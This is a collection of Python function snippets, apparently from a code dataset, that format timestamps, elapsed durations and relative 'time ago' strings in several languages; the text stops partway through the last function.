[ "def humanize_ts(timestamp=False):\n now = datetime.now()\n diff = now - datetime.fromtimestamp(timestamp)\n second_diff = diff.seconds\n day_diff = diff.days\n\n if day_diff < 0:\n return ''\n\n if day_diff == 0:\n if second_diff < 10:\n return \"just now\"\n if second_diff < 60:\n return str(int(second_diff)) + \" seconds ago\"\n if second_diff < 120:\n return \"a minute ago\"\n if second_diff < 3600:\n return str(int(second_diff / 60)) + \" minutes ago\"\n if second_diff < 7200:\n return \"an hour ago\"\n if second_diff < 86400:\n return str(int(second_diff / 3600)) + \" hours ago\"\n if day_diff == 1:\n return \"Yesterday\"\n if day_diff < 7:\n return str(day_diff) + \" days ago\"\n if day_diff < 31:\n return str(int(day_diff / 7)) + \" weeks ago\"\n if day_diff < 365:\n return str(int(day_diff / 30)) + \" months ago\"\n return str(int(day_diff / 365)) + \" years ago\"", "def get_formatted_duration(self, prev_time):\n duration = time() - prev_time\n if duration < 60:\n unit = 's'\n elif duration < 3600:\n duration /= 60\n unit = 'm'\n else:\n duration /= 3600\n unit = 'h'\n return self.format_num(duration) + unit", "def get_elapsed_timestamp(self) -> str:\n t = self.elapsed_time\n minutes = int(t / 60)\n seconds = int(t - (60 * minutes))\n millis = int(100 * (t - int(t)))\n return '{:>02d}:{:>02d}.{:<02d}'.format(minutes, seconds, millis)", "def get_answer_time(self):\n sec = (self.updated_at - self.created_at).total_seconds()\n return f'{int((sec / 60) % 60):02d}:{int(sec):02d}'", "def time_since_as_text(time=False):\n now = datetime.now(timezone.utc)\n if type(time) is int:\n diff = now - datetime.fromtimestamp(time)\n elif isinstance(time,datetime):\n diff = now - time\n elif not time:\n diff = now - now\n second_diff = diff.seconds\n day_diff = diff.days\n\n if day_diff < 0:\n return ''\n\n if day_diff == 0:\n if second_diff < 10:\n return \"nyss\"\n if second_diff < 60:\n return str(second_diff) + \" sekunder sedan\"\n if second_diff < 120:\n return \"a minute ago\"\n if second_diff < 3600:\n return str(floor(second_diff / 60)) + \" minuter sedan\"\n if second_diff < 7200:\n return \"en timme sedan\"\n if second_diff < 86400:\n return str(floor(second_diff / 3600)) + \" timmar sedan\"\n if day_diff == 1:\n return \"Igår\"\n if day_diff < 7:\n return str(day_diff) + \" dagar sedan\"\n if day_diff < 31:\n return str(floor(day_diff / 7)) + \" veckor sedan\"\n if day_diff < 365:\n return str(floor(day_diff / 30)) + \" månder sedan\"\n return str(day_diff / 365) + \" år sedan\"", "def get_formatted_time() -> datetime.strftime:\n\t\n\tnow = datetime.now() # time now\n\thalf_hour = (now - timedelta(minutes = 30)) # time 30 min ago\n\t# returns half hour ago to accommodate for failed checks\n\t# (bc twint behaves as if none found if check failed)\n\tcurrent_time = half_hour.strftime(\"%Y-%m-%d %H:%M:%S\")\n\treturn current_time", "def _time_delta_from_info(info):\n now = datetime.datetime.now()\n then = info.start_time\n return str(now.replace(microsecond=0) - then.replace(microsecond=0))", "def pretty_date(time=False):\n now = datetime.now()\n if type(time) is int:\n diff = now - datetime.fromtimestamp(time)\n elif isinstance(time, datetime):\n diff = now - time\n elif not time:\n diff = now - now\n else:\n diff = now - now\n second_diff = diff.seconds\n day_diff = diff.days\n\n if day_diff < 0:\n return ''\n\n if day_diff == 0:\n if second_diff < 10:\n return \"just now\"\n if second_diff < 60:\n return str(int(round(second_diff, 0))) + \" seconds ago\"\n if second_diff < 120:\n 
return \"a minute ago\"\n if second_diff < 3600:\n return str(int(round(second_diff / 60, 0))) + \" minutes ago\"\n if second_diff < 7200:\n return \"an hour ago\"\n if second_diff < 86400:\n return str(int(round(second_diff / 3600, 0))) + \" hours ago\"\n if day_diff == 1:\n return \"Yesterday\"\n if day_diff < 7:\n return str(int(round(day_diff, 0))) + \" days ago\"\n if day_diff < 31:\n return str(int(round(day_diff / 7, 0))) + \" weeks ago\"\n if day_diff < 365:\n return str(int(round(day_diff / 30, 0))) + \" months ago\"\n return str(int(round(day_diff / 365, 0))) + \" years ago\"", "def get_time():\n ct = time.time()\n lt = time.gmtime(ct)\n msec = int((ct - int(ct)) * 1000)\n return f'{time.strftime(DATE_FMT, lt)}.{msec:0>3}'", "def _getUpTime(self):\n diff = (datetime.datetime.now() - self._startTime).__str__()\n return diff[:diff.find('.')]", "def pretty_date(time=False):\n from datetime import datetime\n\n now = datetime.now()\n if type(time) is int:\n diff = now - datetime.fromtimestamp(time)\n elif isinstance(time, datetime):\n diff = now - time\n elif not time:\n diff = now - now\n second_diff = diff.seconds\n day_diff = diff.days\n\n if day_diff < 0:\n return \"\"\n\n if day_diff == 0:\n if second_diff < 10:\n return \"just now\"\n if second_diff < 60:\n return str(second_diff) + \" seconds ago\"\n if second_diff < 120:\n return \"a minute ago\"\n if second_diff < 3600:\n return str(second_diff / 60) + \" minutes ago\"\n if second_diff < 7200:\n return \"an hour ago\"\n if second_diff < 86400:\n return str(second_diff / 3600) + \" hours ago\"\n if day_diff == 1:\n return \"Yesterday\"\n if day_diff < 7:\n return str(day_diff) + \" days ago\"\n if day_diff < 31:\n return str(day_diff / 7) + \" weeks ago\"\n if day_diff < 365:\n return str(day_diff / 30) + \" months ago\"\n return str(day_diff / 365) + \" years ago\"", "def pretty_date(time=False):\n from datetime import datetime\n now = datetime.now()\n if type(time) is int:\n diff = now - datetime.fromtimestamp(time)\n elif isinstance(time,datetime):\n diff = now - time \n elif not time:\n diff = now - now\n second_diff = diff.seconds\n day_diff = diff.days\n\n if day_diff < 0:\n return ''\n\n if day_diff == 0:\n if second_diff < 10:\n return \"just now\"\n if second_diff < 60:\n return str(second_diff) + \" seconds ago\"\n if second_diff < 120:\n return \"a minute ago\"\n if second_diff < 3600:\n return str( second_diff / 60 ) + \" minutes ago\"\n if second_diff < 7200:\n return \"an hour ago\"\n if second_diff < 86400:\n return str( second_diff / 3600 ) + \" hours ago\"\n if day_diff == 1:\n return \"Yesterday\"\n if day_diff < 7:\n return str(day_diff) + \" days ago\"\n if day_diff < 31:\n return str(day_diff/7) + \" weeks ago\"\n if day_diff < 365:\n return str(day_diff/30) + \" months ago\"\n return str(day_diff/365) + \" years ago\"", "def pretty_deltat(seconds: float) -> str:\n\n # Reject weird stuff\n try:\n seconds = float(seconds)\n except (TypeError, ValueError):\n raise TypeError(\"non-numeric time delta\")\n\n if seconds < 0:\n # If the delta is negative, just print it\n return f\"{seconds:.1f}s\"\n\n hours, seconds = divmod(seconds, 3600)\n minutes, seconds = divmod(seconds, 60)\n\n if hours > 0:\n return f\"{int(hours)}h{int(minutes):02}m{int(seconds):02}s\"\n if minutes > 0:\n return f\"{int(minutes)}m{int(seconds):02}s\"\n\n # For short durations, include tenths of a second\n return f\"{seconds:.1f}s\"", "def realtime_to_ingame_delta_formatted(sec: float) -> str:\n return 
ingame_delta_formatted(realtime_to_ingame_delta(sec))", "def howLongAgo(time=False):\n now = timezone.now()\n if type(time) is int:\n diff = now - datetime.fromtimestamp(time)\n elif isinstance(time,datetime):\n diff = now - time\n elif not time:\n diff = now - now\n second_diff = diff.seconds\n day_diff = diff.days\n\n if day_diff < 0:\n return ''\n\n if day_diff == 0:\n if second_diff < 10:\n return \"genau jetzt\"\n if second_diff < 60:\n return \"vor \" + str(second_diff) + \" Sek.\"\n if second_diff < 120:\n return \"vor einer Min.\"\n if second_diff < 3600:\n return \"vor \" + str( second_diff / 60 ) + \" Min.\"\n if second_diff < 7200:\n return \"vor einer St.\"\n if second_diff < 86400:\n return \"vor \" + str( second_diff / 3600 ) + \" St.\"\n if day_diff == 1:\n return \"Gestern\"\n if day_diff < 7:\n return \"vor \" + str(day_diff) + \" Tagen\"\n if day_diff < 31:\n return \"vor \" + str(day_diff/7) + \" Wochen\"\n if day_diff < 365:\n return \"vor \" + str(day_diff/30) + \" Monaten\"\n return \"vor \" + str(day_diff/365) + \" Jahren\"", "def ago(self):\n return human(self.timestamp/1000.0, precision=1, abbreviate=True)", "def time_elapsed(sec):\n if sec < 60:\n return str(sec) + \" sec\"\n elif sec < (60 * 60):\n return str(sec / 60) + \" min\"\n else:\n return str(sec / (60 * 60)) + \" hr\"", "def _get_time_since_tell_send(tell):\n tell_time_sent = int(tell[3])\n\n current_time = int(time.time())\n\n dt1 = datetime.fromtimestamp(tell_time_sent)\n dt2 = datetime.fromtimestamp(current_time)\n rd = dateutil.relativedelta.relativedelta(dt2, dt1)\n\n out = ''\n\n if rd.days == 1:\n out += f'{rd.days} day, '\n elif rd.days != 0:\n out += f'{rd.days} days, '\n\n if rd.hours == 1:\n out += f'{rd.hours} hour, '\n elif rd.hours != 0:\n out += f'{rd.hours} hours, '\n\n if rd.minutes == 1:\n out += f'{rd.minutes} minute and '\n elif rd.minutes != 0:\n out += f'{rd.minutes} minutes and '\n\n if rd.seconds == 1:\n out += f'{rd.seconds} second ago'\n elif rd.seconds != 0:\n out += f'{rd.seconds} seconds ago'\n elif current_time - tell_time_sent == 0:\n out = 'just now'\n\n return out", "def make_it_rw(time_stamp):\r\n seconds, milliseconds = divmod(int(time_stamp), 1000)\r\n minutes, seconds = divmod(seconds, 60)\r\n hours, minutes = divmod(minutes, 60)\r\n days, hours = divmod(hours, 24)\r\n tmp = (\r\n ((str(days) + \" Days, \") if days else \"\")\r\n + ((str(hours) + \" Hours, \") if hours else \"\")\r\n + ((str(minutes) + \" Minutes, \") if minutes else \"\")\r\n + ((str(seconds) + \" Seconds, \") if seconds else \"\")\r\n + ((str(milliseconds) + \" ms, \") if milliseconds else \"\")\r\n )\r\n return tmp[:-2]", "def unixTimeToString_NEW(ut):\n intTime = int(ut)\n frac = ut - intTime\n #print \"\\nfrac is %f, conv is %f\" % (frac, round(frac*1000))\n y, m, d, ho, mi, se, junk1, junk2, junk3 = gmtime(intTime)\n #print \"ut is %f, s is %4d_%02d_%02d_%02d_%02d_%02d.%03d\\n\" % (ut, y, m, d, ho, mi, se, int(frac*1000))\n #return '%4d_%02d_%02d_%02d_%02d_%02d.%03d' % (y, m, d, ho, mi, se, int(frac*1000))\n return '%4d_%02d_%02d_%02d_%02d_%02d.%03d' % (y, m, d, ho, mi, se, round(frac*1000))", "def elapsed_time_formatted(begin_time):\n return time.strftime(\n \"%H:%M:%S\", (time.gmtime(time.perf_counter() - begin_time))\n )", "def start_delta_string(self):\r\n delta = int(self.start_time) - int(self.root().start_time)\r\n return '%02d:%02d' % (delta / 60, delta % 60)", "def humantime(seconds: float) -> str:\n return redivmod(seconds, [(60, \"seconds\"),\n (60, \"minutes\"),\n (24, \"hours\"),\n 
(7, \"days\"),\n (52, \"weeks\"),\n (0, \"years\")])", "def pretty_date(time=False):\n now = datetime.datetime.utcnow()\n if type(time) is int:\n diff = now - datetime.datetime.fromtimestamp(time)\n elif isinstance(time, datetime.datetime):\n diff = now - time\n elif not time:\n diff = now - now\n second_diff = diff.seconds\n day_diff = diff.days\n\n if day_diff < 0:\n day_diff *= -1\n second_diff *= -1\n if day_diff < 1:\n if second_diff < 10:\n return ugettext('imminently')\n if second_diff < 60:\n return ungettext('{n} second from now', '{n} seconds from now', second_diff).format(n=second_diff)\n if second_diff < 120:\n return ugettext('in a minute')\n if second_diff < 3600:\n return ungettext('{n} minute from now', '{n} minutes from now', second_diff / 60).format(n=second_diff / 60)\n if second_diff < 7200:\n return ugettext('in an hour')\n if second_diff < 86400:\n return ungettext('{n} hour from now', '{n} hours from now', second_diff / 3600).format(n=second_diff / 3600)\n if day_diff == 1:\n return ugettext('tomorrow')\n if day_diff < 7:\n return ungettext('{n} day from now', '{n} days from now', day_diff).format(n=day_diff)\n if day_diff < 31:\n return ungettext('{n} week from now', '{n} weeks from now', day_diff / 7).format(n=day_diff / 7)\n if day_diff < 365:\n return ungettext('{n} month from now', '{n} months from now', day_diff / 30).format(n=day_diff / 30)\n return ungettext('{n} year from now', '{n} years from now', day_diff / 365).format(n=day_diff / 365)\n\n if day_diff == 0:\n if second_diff < 10:\n return ugettext('just now')\n if second_diff < 60:\n return ungettext('{n} second ago', '{n} seconds ago', second_diff).format(n=second_diff)\n if second_diff < 120:\n return ugettext('a minute ago')\n if second_diff < 3600:\n return ungettext('{n} minute ago', '{n} minutes ago', second_diff / 60).format(n=second_diff / 60)\n if second_diff < 7200:\n return ugettext('an hour ago')\n if second_diff < 86400:\n return ungettext('{n} hour ago', '{n} hours ago', second_diff / 3600).format(n=second_diff / 3600)\n if day_diff == 1:\n return ugettext('yesterday')\n if day_diff < 7:\n return ungettext('{n} day ago', '{n} days ago', day_diff).format(n=day_diff)\n if day_diff < 31:\n return ungettext('{n} week ago', '{n} weeks ago', day_diff / 7).format(n=day_diff / 7)\n if day_diff < 365:\n return ungettext('{n} month ago', '{n} months ago', day_diff / 30).format(n=day_diff / 30)\n return ungettext('{n} year ago', '{n} years ago', day_diff / 365).format(n=day_diff / 365)", "def get_duration_string(duration):\n\n minutes = duration // 60\n seconds = duration % 60\n return \"the game took {} minutes and {} seconds\".format(minutes, seconds)", "def pretty_date(time=False):\r\n from datetime import datetime\r\n import dateutil.parser\r\n now = datetime.now()\r\n if type(time) is str or type(time) is unicode:\r\n time = dateutil.parser.parse(time)\r\n if type(time) is int:\r\n diff = now - datetime.fromtimestamp(time)\r\n elif isinstance(time, datetime):\r\n diff = now - time\r\n elif not time:\r\n diff = now - now\r\n second_diff = diff.seconds\r\n day_diff = diff.days\r\n\r\n if day_diff < 0:\r\n return ''\r\n\r\n if day_diff == 0:\r\n if second_diff < 10:\r\n return \"just now\"\r\n if second_diff < 60:\r\n return str(second_diff) + \" seconds ago\"\r\n if second_diff < 120:\r\n return \"a minute ago\"\r\n if second_diff < 3600:\r\n return ' '.join([str(second_diff / 60), \"minutes ago\"])\r\n if second_diff < 7200:\r\n return \"an hour ago\"\r\n if second_diff < 86400:\r\n return ' 
'.join([str(second_diff / 3600), \"hours ago\"])\r\n if day_diff == 1:\r\n return \"Yesterday\"\r\n if day_diff < 7:\r\n return ' '.join([str(day_diff), \"days ago\"])\r\n if day_diff < 31:\r\n return ' '.join([str(day_diff / 7), \"weeks ago\"])\r\n if day_diff < 60:\r\n return ' '.join([str(day_diff / 30), \"month ago\"])\r\n if day_diff < 365:\r\n return ' '.join([str(day_diff / 30), \"months ago\"])\r\n if day_diff < (365 * 2):\r\n return ' '.join([str(day_diff / 365), \"year ago\"])\r\n return ' '.join([str(day_diff / 365), \"years ago\"])", "def time_str(num):\n if num > 3600:\n return \"%0.2f hrs\" % (num / 3600)\n elif num > 60:\n return \"%0.2f mins\" % (num / 60)\n else:\n return \"%d seconds\" % num", "def srt(self):\n return '{:02d}:{:02d}:{:02d},{:03d}'.format(self.hours, self.minutes,\n int(self.seconds // 1),\n int(self.seconds % 1 * 100))", "def age(self) -> str:\n tdelta = dt.now() - self.created_timestamp\n if tdelta.days >= 548: # enough to round it up to 2 years\n return f'about {tdelta.days/365:.0f} years'\n elif tdelta.days >= 345: # enough to round it up to 1 year (so it doesn't report '12 months')\n return f'about a year'\n elif tdelta.days > 45: # beyond 1 month (after rounding)\n return f'about {tdelta.days/30:.0f} months'\n elif tdelta.days > 24: # enough to round it up to 1 month (so it doesn't report '4 weeks')\n return f'about a month'\n elif tdelta.days > 7:\n # round to nearest half, dropping '.0' when whole\n return f'{round((tdelta.days/7)*2)/2:g} weeks'\n elif tdelta.days == 7:\n return 'a week'\n elif tdelta.days > 1:\n return f'{tdelta.days} days'\n elif tdelta.days == 1:\n return f'a day'\n # break it down into parts of a day\n hours = tdelta.seconds // 3600\n if hours > 1:\n return f'{hours:.0f} hours'\n elif hours == 1:\n return f'an hour'\n minutes = tdelta.seconds % 3600 / 60\n if minutes > 1:\n return f'{minutes:.0f} minutes'\n elif minutes == 1:\n return f'a minute'\n return 'moments'", "def seconds2human(self, my_time):\n my_days, my_seconds = divmod(my_time, 86400)\n time_delta = timedelta(seconds=my_seconds)\n reminder = strftime(\"%H:%M:%S\", gmtime(time_delta.seconds))\n if my_days > 1:\n return \"%s days, %s\" % (my_days, reminder)\n elif my_days == 1:\n return \"%s day, %s\" % (my_days, reminder)\n else:\n return strftime(\"%H:%M:%S\", gmtime(time_delta.seconds))", "def get_human_readable_time(seconds):\n start_time = time.time()\n timestring = ''\n remainder = seconds\n\n days = int(remainder // (60*60*24))\n remainder -= days*60*60*24\n\n hours = int(remainder // (60*60))\n remainder -= hours*60*60\n\n minutes = int(remainder // 60)\n remainder -= minutes*60\n\n secs = round(remainder, 2)\n \n timestring = \"{} minutes and {} seconds\".format(minutes, secs)\n if hours > 0:\n timestring = \"{} hours, \".format(hours) + timestring\n if days > 0:\n timestring = \"{} days, \".format(days) + timestring\n\n return timestring", "def elapsed(t1, t2):\n # Use the timedelta's standard formatting, except discard microseconds.\n retval = str(t2 - t1)\n m = re.match(r\"([^.]+)\\.([0-9]+)\", retval)\n if m:\n retval = m.group(1)\n return retval", "def format_elapsed_time(seconds):\n minutes = int(round(seconds / 60))\n hours, minutes = divmod(minutes, 60)\n result = '{minutes}m'.format(minutes=minutes)\n\n if hours:\n days, hours = divmod(hours, 24)\n result = '{hours}h {prev}'.format(hours=hours, prev=result)\n\n if days:\n result = '{days}d {prev}'.format(days=days, prev=result)\n\n return result", "def get_timestamp(self, day_diff=0):\n diff = 
datetime.timedelta(days=day_diff)\n now = datetime.datetime.now() - diff\n return now.strftime('%Y')+'-'+now.strftime('%m')+'-'+now.strftime('%d')+'T'+now.strftime('%H')+':'+now.strftime('%M')+':'+now.strftime('%S')", "def elapsed(timestamp):\n return repoze.timeago.get_elapsed(timestamp)", "def elapsed_human(self):\n intervals = (\n ('weeks', 604800),\n ('days', 86400),\n ('hours', 3600),\n ('mins', 60),\n ('secs', 1),\n )\n seconds = self.elapsed\n result = []\n for name, count in intervals:\n value = int(seconds // count)\n if value:\n seconds -= value * count\n if value == 1:\n name = name.rstrip('s')\n result.append(\"{} {}\".format(value, name))\n return ', '.join(result)", "def format_seconds(s):\n return '%dh %dm' % (s//3600, (s//60) % 60)", "def _format_time(seconds):\n hrs = seconds // 3600\n seconds -= 3600 * hrs\n mins = seconds // 60\n seconds -= 60 * mins\n return '%02dh%02dm%02ds' % (hrs, mins, seconds)", "def get_timestamp():\n now, s=get_date()\n return (now, \"%s%s%s%s\" % (s, str(now.hour).zfill(2), str(now.minute).zfill(2), str(now.second).zfill(2)))", "def printTime(t):\n if t < 2 * MINUTE:\n return \"%d seconds\" % (t / SECOND)\n if t < 5 * HOUR:\n return \"%d minutes\" % (t / MINUTE)\n if t < 3 * DAY:\n return \"%d hours\" % (t / HOUR)\n if t < YEAR:\n return \"%d days\" % (t / DAY)\n if (t % YEAR) == 0:\n return \"%d years\" % (t / YEAR)\n else:\n return \"%5.1f years\" % (t / YEAR)", "async def humanize_time(self, value):\n if value is None:\n return \"None\"\n return str(datetime.timedelta(seconds=value))", "def get_time(self):\n x = time.localtime()\n return ''.join([\n str(x[0]).rjust(4, '0'), '/', str(x[1]).rjust(2, '0'), '/',\n str(x[2]).rjust(2, '0'), ' ', str(x[3]).rjust(2, '0'), ':',\n str(x[4]).rjust(2, '0'), ':', str(x[5]).rjust(2, '0')])", "def humanize_time(seconds):\n seconds = abs(seconds)\n minutes, seconds = divmod(seconds, 60)\n hours, minutes = divmod(minutes, 60)\n days, hours = divmod(hours, 24)\n weeks, days = divmod(days, 7)\n\n seconds = int(seconds)\n minutes = int(minutes)\n hours = int(hours)\n days = int(days)\n weeks = int(weeks)\n\n output = []\n\n if weeks:\n output.append(\"{:02d} weeks\".format(weeks))\n if days:\n output.append(\"{:02d} days\".format(days))\n if hours:\n output.append(\"{:02d} hours\".format(hours))\n if minutes:\n output.append(\"{:02d} minutes\".format(minutes))\n\n output.append(\"{:02d} seconds\".format(seconds))\n\n return \" \".join(output)", "def track_length_string(length):\n return str(timedelta(microseconds=length))", "def now_short(_format=\"%Y%m%d-%H%M%S\"):\n timeString = time.strftime(_format, time.localtime()) + \"\\t\"\n return timeString", "def readable_timedelta(timedeltaobj):\n # stolen from https://stackoverflow.com/a/46928226/8207\n if not timedeltaobj:\n return '---'\n secs = timedeltaobj.total_seconds()\n timetot = \"\"\n if secs > 86400: # 60sec * 60min * 24hrs\n days = secs // 86400\n timetot += \"{} days\".format(int(days))\n secs = secs - days * 86400\n\n if secs > 3600:\n hrs = secs // 3600\n timetot += \" {} hours\".format(int(hrs))\n secs = secs - hrs * 3600\n\n if secs > 60:\n mins = secs // 60\n timetot += \" {} minutes\".format(int(mins))\n secs = secs - mins * 60\n\n if secs > 0:\n timetot += \" {} seconds\".format(int(secs))\n return timetot", "def human_timedelta(delta):\n seconds = delta.seconds % 60 if delta.seconds else 0\n minutes = delta.seconds // 60 % 60 if delta.seconds else 0\n hours = delta.seconds // 3600 % 24 if delta.seconds else 0\n days = abs(delta.days) % 7 if 
delta.days else 0\n weeks = abs(delta.days) // 7 if delta.days else 0\n parts = []\n\n if weeks > 0:\n parts.append(f'{weeks} uger')\n if days > 0:\n parts.append(f'{days} dage')\n if hours > 0:\n parts.append(f'{hours} timer')\n if minutes > 0:\n parts.append(f'{minutes} minutter')\n if seconds > 0:\n parts.append(f'{seconds} sekunder')\n\n sentence = None\n if len(parts) == 1:\n (sentence) = parts\n else:\n last = parts.pop()\n sentence = f'{\", \".join(parts)}, og {last}'\n\n if delta.days < 0:\n return f'for {sentence} siden'\n\n return f'om {sentence}'", "def time_since(dt, default=\"just now\"):\n\t\n\tnow = datetime.utcnow()\n\tdiff = now - dt\n\t\n\tperiods = (\n\t\t(diff.days / 365, \"year\", \"years\"),\n\t\t(diff.days / 30, \"month\", \"months\"),\n\t\t(diff.days / 7, \"week\", \"weeks\"),\n\t\t(diff.days, \"day\", \"days\"),\n\t\t(diff.seconds / 3600, \"hour\", \"hours\"),\n\t\t(diff.seconds / 60, \"minute\", \"minutes\"),\n\t\t(diff.seconds, \"second\", \"seconds\"),\n\t)\n\n\tfor period, singular, plural in periods:\n\t\tif period:\n\t\t\treturn \"%d %s ago\" % (period, singular if period == 1 else plural)\n\n\treturn default", "def timestr():\n return dt.strftime(dt.now(),'%H:%M:%S')", "def get_time_string(time):\r\n mins = time // 60\r\n secs = time % 60\r\n time_string = ''\r\n\r\n if mins < 10:\r\n time_string += ' '\r\n elif mins < 100:\r\n time_string += ' '\r\n\r\n time_string += '%dm ' % mins\r\n\r\n if secs < 10:\r\n time_string += ' '\r\n\r\n time_string += '%ds' % secs\r\n\r\n return time_string", "def get_elapsed_time(start, end):\n return \"%s days, %s hours, %s minutes, %s seconds\" % dhms_from_seconds(date_diff_in_seconds(start, end))", "def time_string(time_f: float) -> str:\n m, s = divmod(time_f, 60)\n h, m = divmod(m, 60)\n\n if h < 1:\n if m < 1 and s < 1:\n msec = int(s * 1000)\n return '{:=03d}msec'.format(msec)\n\n if m < 1:\n return '{:=02.0f}sec'.format(s)\n\n return '{:=02.0f}min:{:=02.0f}sec'.format(m, s)\n else:\n return '{:=01.0f}h:{:=02.0f}min:{:=02.0f}sec'.format(h, m, s)", "def human_seconds(seconds):\n if seconds < 60:\n return '{: >5.1f} seconds'.format(seconds)\n if seconds < 60*60:\n return '{: >5.1f} minutes'.format(seconds / 60)\n return '{: >7.1f} hours'.format(seconds / (60 * 60))", "def elapsed(self):\n return str(datetime.datetime.now() - self.start).split('.')[0]", "def as_duration(abs_time_in_seconds):\n\n durations = (\n ('s', 1),\n ('m', 60),\n ('h', 60 * 60),\n ('d', 60 * 60 * 24),\n ('w', 60 * 60 * 24 * 7)\n )\n\n duration = time.time() - abs_time_in_seconds\n result = \"now\"\n\n for label, length in durations:\n if length > duration:\n break\n result = \"{:.0f}{}\".format(math.ceil(duration / length), label)\n\n return result", "def time_hack(self):\n now = datetime.datetime.now()\n monthnames = ['jan', 'feb', 'mar', 'apr', 'may', 'jun',\n 'jul', 'aug', 'sep', 'oct', 'nov', 'dec']\n month = monthnames[now.month - 1].capitalize()\n return ('[%02d/%s/%04d:%02d:%02d:%02d.%06d]' %\n (now.day, month, now.year, now.hour, now.minute, now.second, now.microsecond))", "def format_time_since(self, timedelta: timedelta):\n\n seconds = timedelta.total_seconds()\n\n periods = [\n (_(\"day\"), _(\"days\"), 60 * 60 * 24),\n (_(\"hour\"), _(\"hours\"), 60 * 60),\n (_(\"minute\"), _(\"minutes\"), 60),\n ]\n\n strings = []\n for period_name, plural_period_name, period_seconds in periods:\n if seconds >= period_seconds:\n period_value, seconds = divmod(seconds, period_seconds)\n if period_value == 0:\n continue\n unit = plural_period_name if 
period_value > 1 else period_name\n strings.append(f\"{int(period_value)} {unit}\")\n\n return \", \".join(strings)", "def get_time_string(self):\n return f\"{self.year} {self.month:02} \" \\\n f\"{self.start_day:02} {self.start_hour:02} 00 {self.get_duration():6}\"", "def timesince(dt, default=\"just now\"):\n\n now = datetime.datetime.now()\n diff = now - dt\n \n periods = (\n (diff.days / 365, \"year\", \"years\"),\n (diff.days / 30, \"month\", \"months\"),\n (diff.days / 7, \"week\", \"weeks\"),\n (diff.days, \"day\", \"days\"),\n (diff.seconds / 3600, \"hour\", \"hours\"),\n (diff.seconds / 60, \"minute\", \"minutes\"),\n (diff.seconds, \"second\", \"seconds\"),\n )\n\n for period, singular, plural in periods:\n \n if period:\n return \"%d %s ago\" % (period, singular if period == 1 else plural)\n\n return default", "def timing(t):\r\n if t < 1:\r\n power = int(np.log10(t))-1\r\n num = t/10**power\r\n if abs(power) < 10:\r\n return '{0:.1f}e-0{1:.0f}s'.format(num, abs(power))\r\n return '{0:.1f}e-{1:.0f}s'.format(num, abs(power))\r\n if t >= 1 and t < 60:\r\n return '{0:.1f}s'.format(t)\r\n if t >= 60 and t < 3600:\r\n minutes = int(t/60)\r\n seconds = t-(60*minutes)\r\n return '{0:.0f}m, {1:.1f}s'.format(minutes, seconds)\r\n if t >= 3600 and t < 86400:\r\n hours = int(t/3600)\r\n minutes = int((t-(3600*hours))/60)\r\n seconds = t-(3600*hours + 60*minutes)\r\n return '{0:.0f}h, {1:.0f}m, {2:.1f}s'.format(hours, minutes, seconds)\r\n if t >= 86400 and t < 31536000:\r\n days = int(t/86400)\r\n hours = int((t-(86400*days))/3600)\r\n minutes = int((t-(86400*days + 3600*hours))/60)\r\n seconds = t - (86400*days + 3600*hours + 60*minutes)\r\n return '{0:.0f}d, {1:.0f}h, {2:.0f}m, {3:.1f}s'.format(days, hours, minutes, seconds)\r\n if t >= 31536000:\r\n years = int(t/31536000)\r\n if years > 9999:\r\n years = t/31536000\r\n power = int(np.log10(years))\r\n num = years/10**power\r\n if abs(power) < 10:\r\n return '{0:.2f}e+0{1:.0f} years'.format(num, abs(power))\r\n return '{0:.2f}e+{1:.0f} years'.format(num, abs(power))\r\n days = int((t-(31536000*years))/86400)\r\n hours = int((t-(31536000*years + 86400*days))/3600)\r\n minutes = int((t-(31536000*years + 86400*days + 3600*hours))/60)\r\n seconds = t - (31536000*years + 86400*days + 3600*hours + 60*minutes)\r\n return '{0:.0f}y, {1:.0f}d, {2:.0f}h, {3:.0f}m, {4:.1f}s'.format(years, days, hours, minutes, seconds)", "def pretty_date(time=None):\n now = datetime.now()\n if type(time) is int:\n diff = now - datetime.fromtimestamp(time)\n elif isinstance(time, datetime):\n diff = now - time\n elif not time:\n diff = now - now\n second_diff = diff.seconds\n day_diff = diff.days\n\n if day_diff < 0:\n return ''\n\n if day_diff == 0:\n if second_diff < 10:\n return \"刚刚\"\n if second_diff < 60:\n return str(second_diff) + \" 秒前\"\n if second_diff < 120:\n return \"1一分钟前\"\n if second_diff < 3600:\n return str(second_diff / 60) + \" 分钟前\"\n if second_diff < 7200:\n return \"1小时前\"\n if second_diff < 86400:\n return str(second_diff / 3600) + \" 小时前\"\n if day_diff == 1:\n return \"昨天\"\n if day_diff < 7:\n return str(day_diff) + \" 天前\"\n if day_diff < 31:\n return str(day_diff / 7) + \" 周前\"\n if day_diff < 365:\n return str(day_diff / 30) + \" 个月前\"\n return str(day_diff / 365) + \" 年前\"", "def format_time(t: float):\n if t >= 60:\n return f\"{round(t / 60.0, 2)} mins\"\n else:\n return f\"{round(t, 2)} secs\"", "def now_short(_format=\"%Y%m%d-%H%M%S\"):\n return time.strftime(_format, time.localtime()) + \"\\t\"", "def get_time(self):\n return 
\"%02u:%02u:%02u (%d)\" % self.rtc.datetime()[4:8]", "def format_duration(seconds: float) -> str:\n if seconds < 60:\n return f'{seconds:.0f}s'\n elif seconds < 3600:\n minutes = math.floor(seconds / 60)\n seconds -= minutes * 60\n return f'{minutes}m{seconds:.0f}s'\n else:\n hours = math.floor(seconds / 3600)\n seconds -= hours * 3600\n minutes = math.floor(seconds / 60)\n seconds -= minutes * 60\n return f'{hours}h{minutes}m{seconds:.0f}s'", "def format_duration(seconds: int) -> str:\n\n if seconds == 0:\n return 'now'\n\n result = ''\n\n years = calc_years(seconds)\n days = calc_days(seconds)\n hours = calc_hours(seconds)\n minutes = calc_minutes(seconds)\n seconds = calc_seconds(seconds)\n\n if years > 0:\n result += '{}'.format(get_string(years, 'year'))\n\n if days > 0:\n if result != '':\n result += ', {}'.format(get_string(days, 'day'))\n else:\n result += '{}'.format(get_string(days, 'day'))\n\n if hours > 0:\n if result != '':\n result += ', {}'.format(get_string(hours, 'hour'))\n else:\n result += '{}'.format(get_string(hours, 'hour'))\n\n if minutes > 0:\n if result != '':\n if seconds == 0:\n result += ' and {}'.format(get_string(minutes, 'minute'))\n else:\n result += ', {}'.format(get_string(minutes, 'minute'))\n else:\n result += '{}'.format(get_string(minutes, 'minute'))\n\n if seconds > 0:\n if result != '':\n result += ' and {}'.format(get_string(seconds, 'second'))\n else:\n result += '{}'.format(get_string(seconds, 'second'))\n\n return result", "def format_seconds(duration):\n\treturn stats_utils.format_seconds(duration)", "def format_duration(seconds: Union[float, int],\n short_units: bool = True,\n keep_zeros: bool = False):\n if short_units:\n units = [(86400, 'd', 